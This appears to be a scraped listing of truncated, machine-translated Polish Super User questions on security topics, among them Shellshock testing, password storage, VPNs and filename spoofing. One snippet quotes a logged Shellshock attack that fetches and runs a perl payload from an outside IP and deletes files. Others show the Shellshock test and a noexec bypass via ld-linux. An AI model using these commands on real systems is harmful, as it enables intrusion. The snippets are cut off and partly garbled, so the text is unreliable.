Ponieważ używam jednego do dekoracji choinki, a ludzie patrzą prosto na niego każdego
Ponieważ używam jednego do dekoracji choinki, a ludzie patrzą prosto na niego każdego
Polecenie testowe x='() { :;}; echo vulnerable' bash pokazuje, że moja instalacja Debian 8 (Jessie) jest podatna na atak, nawet przy najnowszych aktualizacjach. Badania pokazują, że istnieje łatka na stabilne i niestabilne, ale testowanie jest niedopasowane. Wydaje mi się, że łatka przejdzie do...
Standardowa od wielu lat rada dotycząca kompresji i szyfrowania głosi, że siła szyfrowania zip jest zła. Czy tak jest naprawdę w dzisiejszych czasach? Przeczytałem ten artykuł o WinZip (miał tę samą złą reputację). Zgodnie z tym artykułem problem został usunięty, pod warunkiem, że podczas...
Czy zapisane poświadczenia pulpitu zdalnego są bezpieczne (luźno mówiąc) na komputerze lokalnym? Nie są one nigdzie przechowywane jako czysty tekst, prawda? Edycja: Rozumiem nieodłączne ryzyko związane z zapisywaniem haseł. Z pewnością istnieje szereg skuteczności, na przykład zapisanie hasła za...
Moja firma planuje kupić kilka laptopów do celów demonstracyjnych na stoisku konferencyjnym. Wcześniej zawsze kupowaliśmy laptopy z gniazdami Kensington na typowe zamki kablowe. Teraz laptop, który najbardziej nam się podoba, to ultrabook bez gniazda Kensington i szukamy mechanizmu, który nie...
Zamknięte. To pytanie jest nie na temat . Obecnie nie przyjmuje odpowiedzi. Chcesz poprawić to pytanie? Zaktualizować pytanie , dlatego na temat Super Użytkownika. Zamknięte 4 lata temu . Czy istnieje menedżer haseł, którego mogę używać na wielu...
Nie ufałbym Dropbox moim danym bankowym i tym podobnym (ponieważ wiele osób szuka takich informacji), ale czy bezpiecznie jest przechowywać rzeczy, które mogą być cenne dla niewielkiej liczby osób? Np. Informacje wrażliwe z handlowego punktu widzenia, projekty artykułów naukowych, arkusze...
Podczas czytania tego znalazłem następujący exploit: % cp /usr/bin/id ~ % chmod -x ~/id % ls -al ~/id -rw-r--r-- 1 edd edd 22020 2012-08-01 15:06 /home/edd/id % ~/id zsh: permission denied: /home/edd/id % /lib/ld-linux.so.2 ~/id uid=1001(edd) gid=1001(edd) groups=1001(edd),1002(wheel) Ten...
Czytam, że wyłączenie Java - nie JavaScript - sprawi, że mój komputer będzie bezpieczniejszy przed atakami złośliwego oprogramowania. Wszystko wskazuje na to, że rzeczywiście uczyni to bezpieczniejszym, ale nie ma żadnych prawdziwych powodów, jak to, co stracę podczas przeglądania, jeśli w ogóle....
Co to jest odpowiednik ntrights.exew systemie Windows 7? Potrzebuję go do uruchomienia z wiersza
Widziałem to access.logna moim serwerze testowym: > 173.45.100.18 - - [26/Sep/2014:07:09:53 +0200] "GET /cgi-bin/hi HTTP/1.0" 404 490 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget > http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; > perl /tmp/ji;rm -rf /tmp/ji;rm -rf...
Naprawdę podoba mi się ten dodatek HTTPS Everywhere do przeglądarki Firefox. Ale mam tendencję do przeskakiwania przeglądarki, więc czy podobne dodatki preferujące HTTPS zostały wydane dla innych głównych
Biorąc pod uwagę, że krąży exploit ransomware WannaCry, chciałem sprawdzić, czy mój komputer ma konkretną aktualizację zabezpieczeń, która powinna zatrzymać lukę - najwyraźniej MS17-010, zakładając, że rozumiem lukę i to jest rzeczywiście właściwa łatka. Jak sprawdzić ten szczegół? Microsoft...
Zamknięte . To pytanie musi być bardziej skoncentrowane . Obecnie nie przyjmuje odpowiedzi. Chcesz poprawić to pytanie? Zaktualizuj pytanie, aby skupiało się tylko na jednym problemie, edytując ten post . Zamknięte 2 lata temu . Niedawno, w ostatnim roku...
Oprócz pytania tytułowego, czy te dwie technologie są kompatybilne? Jeśli tak, to w jakich okolicznościach? Jakie są względne zalety tych dwóch
Jakie są dostępne opcje ochrony folderu hasłem? Mówię o wymaganiu hasła, aby faktycznie uzyskać dostęp do folderu, a nie tylko praw dostępu użytkownika. Czy oprogramowanie innych firm jest bezpieczne i stabilne? Jakie są
Zastanawiam się nad tym od dłuższego czasu. Jeśli korzystam, powiedzmy, z Gmaila przez https, czy ktoś może czytać moje wiadomości błyskawiczne i e-maile, jeśli korzystam z niezabezpieczonej sieci bezprzewodowej? Zakładam, że dane byłyby bezpieczne, ponieważ używa szyfrowanego połączenia. Czy jest...
Istnieje kilku dostawców usług, którzy pozwalają użytkownikowi omijać zapory ogniowe lub anonimizować dostęp do sieci. Niektóre z nich korzystają z serwerów proxy, niektóre z VPN. Większość ludzi twierdzi, że sieci VPN zwykle działają lepiej niż serwery proxy. Są również ogólnie droższe. Na...
To pytanie zostało przeniesione z Information Security Stack Exchange, ponieważ można na nie odpowiedzieć w trybie Super User. Migrował 7 lat temu . Mój system jest szyfrowany przy użyciu pełnego szyfrowania dysku, tzn. Wszystko oprócz / boot jest szyfrowane przy użyciu...
Jakie są sposoby unikania lub zapobiegania zapisywaniu lub odczytywaniu plików ze znakiem Unicode RLO (od prawej do lewej) w ich nazwie (złośliwa metoda fałszowania nazw plików) na komputerze z systemem Windows? Więcej informacji na temat znaku Unicode RLO tutaj: Znak Unicode „PRAWO DO LEWEGO...